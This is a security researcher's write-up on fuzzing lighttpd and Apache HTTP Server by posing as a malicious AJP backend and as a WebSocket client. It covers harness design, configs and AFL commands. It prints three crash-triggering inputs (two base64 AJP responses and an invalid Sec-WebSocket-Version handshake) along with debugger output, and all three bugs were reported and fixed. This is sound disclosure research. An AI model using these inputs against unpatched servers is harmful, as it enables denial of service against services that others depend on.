Taking a different approach to fuzzing HTTP servers


tl;dr: I took a non-standard approach to fuzzing HTTP servers: instead of acting as an HTTP client, I fuzzed from the perspective of a backend server (with the target HTTP server acting as a proxy) and of a WebSocket client. In total, this revealed 3 bugs in Apache HTTP Server and lighttpd.


I decided to take another look at HTTP servers, but this time from a different, less typical angle. Instead of fuzzing a server from the perspective of an HTTP client, I wanted to play a bit and consider different potential scenarios.

Approach 1 - malicious backend

Fuzzing from the perspective of a backend. In this case, the target HTTP server was configured to act as a reverse proxy: receive a fixed HTTP request, pass it to a backend, and then receive and process an HTTP response that was subject to manipulation by the fuzzer.


Besides the typical reverse proxy configuration (mod_proxy), lighttpd also supports forwarding to AJP/1.3 backends (mod_ajp13). Both configurations were worth checking, but AJP was the more interesting one: it's less common than HTTP, so it could be less polished and contain more bugs.

Building a corpus of HTTP responses was pretty straightforward and is covered in many different places, so I'll skip it. Preparing a corpus for the AJP/1.3 part required more effort. This protocol is mostly used for forwarding traffic between a reverse proxy and an application backend, so it's rarely exposed publicly. It's supported, for example, by Tomcat, WildFly, and GlassFish. To build the corpus, I set up Tomcat and configured lighttpd to forward traffic to it. I used tcpdump to record all the network traffic while issuing various requests (authorized and unauthorized, accessing existing and non-existing resources) through lighttpd, but also while interacting with Tomcat directly using nmap's AJP-related scripts (ajp-auth, ajp-headers, ajp-methods, ajp-request). The AJP responses extracted from the dump formed the final corpus.
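The extraction step relies on AJP/1.3's simple framing: each container-to-proxy frame starts with the magic bytes `AB` (0x41 0x42), followed by a big-endian 16-bit payload length and the payload itself. A minimal splitter might look like this (the function name and the sample bytes are my own illustration, not the actual tooling used):

```python
import struct

def split_ajp_responses(stream: bytes):
    """Split a raw container-to-proxy byte stream into AJP response frames.

    Each frame: magic 'AB', big-endian uint16 payload length, then payload.
    """
    frames = []
    i = 0
    while i + 4 <= len(stream):
        if stream[i:i + 2] != b"AB":
            break  # not at a frame boundary; stop rather than guess
        (length,) = struct.unpack(">H", stream[i + 2:i + 4])
        frames.append(stream[i:i + 4 + length])
        i += 4 + length
    return frames

# Example: two back-to-back frames (a SEND_HEADERS-like payload, then an
# END_RESPONSE-like one) as they might appear in a captured stream.
raw = b"AB\x00\x03\x04\x00\xc8" + b"AB\x00\x02\x05\x01"
for frame in split_ajp_responses(raw):
    print(frame.hex())
```

Each extracted frame then becomes one corpus file for the fuzzer to mutate.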

server.document-root = "/home/mmm/lighttpd/webroot"
server.port = 8001
server.modules += ("mod_ajp13")
ajp13.server = ( "" =>
  ( (
    "host" => "",
    "port" => 5577
  ) )
)

Writing a harness was trickier, as I had to implement a socket-based server and client directly in the lighttpd code. The full code is available here and is quite long, so I'll give a high-level overview of it:

  1. Create a listening socket on port 5577 (this one simulates the AJP backend).
  2. Create a socket, connect to lighttpd (port 8001), and send a fixed HTTP request (this one simulates the HTTP client).
  3. Receive an AJP request and respond with a mutated AJP response.
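The steps above can be sketched in standalone form like this (the real harness lives inside the lighttpd C code; this Python version is only an illustration of the flow, with the ports and a fixed request mirroring the configuration above):

```python
import socket

BACKEND_PORT = 5577   # simulated AJP backend (matches ajp13.server above)
LIGHTTPD_PORT = 8001  # lighttpd front-end (matches server.port above)

def run_one_iteration(mutated_ajp_response: bytes) -> bytes:
    # 1. Listen where lighttpd expects the AJP backend to be.
    backend = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    backend.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    backend.bind(("127.0.0.1", BACKEND_PORT))
    backend.listen(1)

    # 2. Act as the HTTP client: send a fixed request to lighttpd.
    client = socket.create_connection(("127.0.0.1", LIGHTTPD_PORT))
    client.sendall(b"GET / HTTP/1.1\r\nHost: localhost\r\n\r\n")

    # 3. Accept lighttpd's forwarded AJP request and answer with the
    #    fuzzer-mutated AJP response.
    conn, _ = backend.accept()
    conn.recv(65536)                  # the AJP-encoded request; ignored here
    conn.sendall(mutated_ajp_response)
    conn.close()

    reply = client.recv(65536)        # what lighttpd makes of the response
    client.close()
    backend.close()
    return reply
```

Doing this in-process instead, as the real harness does, avoids the per-iteration socket setup cost and keeps everything under AFL's instrumentation.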

Finally, I was ready to build and start fuzzing.

sudo scons -j 4 build_static=1 build_dynamic=0 install
export FUZZINPUTFILE=/home/mmm/lighttpd/input
afl-fuzz -G 10240 -i ~/lighttpd/corpus/ -o ~/lighttpd/fuzz/output -f /home/mmm/lighttpd/input  -- /usr/local/sbin/lighttpd -D -f /home/mmm/lighttpd/my.conf

The fuzzing revealed one case where a malformed AJP response (QUIAAASA/wAA in base64) triggered a heap buffer overflow read and, as a result, crashed the server.
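It takes very little to decode the crashing input and see why it is malformed: after the `AB` magic, the declared payload length doesn't match the bytes that actually follow. Notably, the ASan READ size below, 16706, is 0x4142, which is apparently the `AB` magic itself ending up interpreted as a length somewhere in the parsing (my reading of the output, not a confirmed root cause):

```python
import base64

# The base64-encoded input that crashed lighttpd's mod_ajp13
crasher = base64.b64decode("QUIAAASA/wAA")
print(crasher.hex(" "))  # 41 42 00 00 04 80 ff 00 00
```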

==1859941==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x625000004901 at pc 0x000000434647 bp 0x7fffffffda60 sp 0x7fffffffd220
READ of size 16706 at 0x625000004901 thread T0
Program received signal SIGSEGV, Segmentation fault.
ajp13_expand_headers (hctx=0x5555555f14e0, plen=4294869346, b=0x5555555e66d0) at src/mod_ajp13.c:740
740                len = ajp13_dec_uint16(ptr);
(gdb) print ptr
$1 = (uint8_t *) 0x555555607000 <error: Cannot access memory at address 0x555555607000>

I reported the issue and it was fixed in lighttpd 1.4.67.

Apache HTTP

I took the same approach with Apache. The general idea and the corpus remained the same; only the configuration file and the harness required adaptation.

<VirtualHost *:80>
    ProxyRequests Off
    ProxyPass / ajp://localhost:8012/
    ServerAdmin webmaster@localhost
    DocumentRoot /var/www/html
    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>

This time, too, one crash was found. A null pointer dereference occurred when the server received a malformed AJP response (QUIAEAQAEABlZS1wYzktMQAgCgBBQgACBQFR in base64). The r->headers_out pointer in the ap_content_length_filter function (protocol.c) was null while being passed to the apr_table_setn function. As a result, a process or a thread crashed (depending on the configuration).
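Decoding this input too (the structural reading below is my own interpretation of the AJP framing, not from the bug report) shows a SEND_HEADERS-style frame carrying the string ee-pc9-1, followed by a tiny second `AB` frame whose payload starts with 0x05, the END_RESPONSE prefix:

```python
import base64

# The base64-encoded input that crashed Apache's AJP proxy path
crasher = base64.b64decode("QUIAEAQAEABlZS1wYzktMQAgCgBBQgACBQFR")
print(crasher.hex(" "))
```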

Thread 3 "httpd" received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7ffff728a700 (LWP 289134)]
0x00007ffff7ecfe2b in apr_table_setn () from /lib/x86_64-linux-gnu/libapr-1.so.0
(gdb) up
#1  0x00005555555a0758 in ap_set_content_length (r=0x7ffff424d0a0, clength=0) at protocol.c:163
163     apr_table_setn(r->headers_out, "Content-Length",
(gdb) print r->headers_out
$1 = (apr_table_t *) 0x0

I reported it to the Apache Security Team. It wasn't classified as a security vulnerability but as a hardening issue, and it was eventually fixed.

Approach 2 - malicious WebSocket client

Fuzzing from the perspective of a WebSocket client. The target HTTP server was configured to receive and forward WebSocket data.

This approach was easier to implement because the harness (available here) just needed to send a packet over a socket. I also decided to skip Apache and focus only on lighttpd and its mod_wstunnel.

Configuration was based on an example backend script from the documentation.

server.document-root = "/home/m/webroot"
server.port = 3000
mimetype.assign = (
  ".html" => "text/html",
)

server.modules += ("mod_wstunnel")
wstunnel.server = (
  "/ws/" => (
      "socket" => "/dev/shm/psock",
      "bin-path" => "/home/m/echo.pl",
      "max-procs" => 1
  )
)

The corpus consisted mostly of HTTP requests performing a WebSocket handshake.

Even such a limited corpus and coverage led to the discovery of one more bug. When the server received a handshake with an invalid value in the Sec-WebSocket-Version header (for example, Sec-WebSocket-Version: x), it triggered a null pointer dereference, resulting in a crash.
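A handshake like the one below is enough to illustrate the trigger (a sketch: the path /ws/ and port 3000 come from the configuration above, while build_handshake and the Sec-WebSocket-Key value are my own illustrative choices):

```python
def build_handshake(version: str) -> bytes:
    """Build a WebSocket upgrade request with an arbitrary version value."""
    return (
        "GET /ws/ HTTP/1.1\r\n"
        "Host: localhost:3000\r\n"
        "Upgrade: websocket\r\n"
        "Connection: Upgrade\r\n"
        "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==\r\n"
        f"Sec-WebSocket-Version: {version}\r\n"
        "\r\n"
    ).encode()

# A valid handshake would send a numeric version such as 13;
# a non-numeric value like "x" is what triggered the crash.
request = build_handshake("x")
```

Sending such a request over a plain TCP socket to the configured port reproduces the condition.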

$ gdb --args lighttpd -D -f server.conf 
(gdb) r
Starting program: /usr/local/sbin/lighttpd -D -f server.conf
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
2022-08-02 16:41:47: (/home/osboxes/lighttpd-1.4.65/src/server.c.1588) server started (lighttpd/1.4.65)

Program received signal SIGSEGV, Segmentation fault.
0x0000000000000000 in ?? ()
(gdb) up
#1  0x000055555559d75e in gw_write_request (hctx=0x5555555e3fd0, r=0x5555555e1230) at /home/osboxes/lighttpd-1.4.65/src/gw_backend.c:1993
1993                handler_t rc = hctx->create_env(hctx);
(gdb) print hctx->create_env
$1 = (handler_t (*)(struct gw_handler_ctx *)) 0x0

This crash was also reported and fixed.


Changing the approach to fuzzing and exploring different scenarios proved to be a successful way to uncover bugs still lurking in popular software. Even though the findings were not critical, they could still disrupt the operation of servers running the affected code.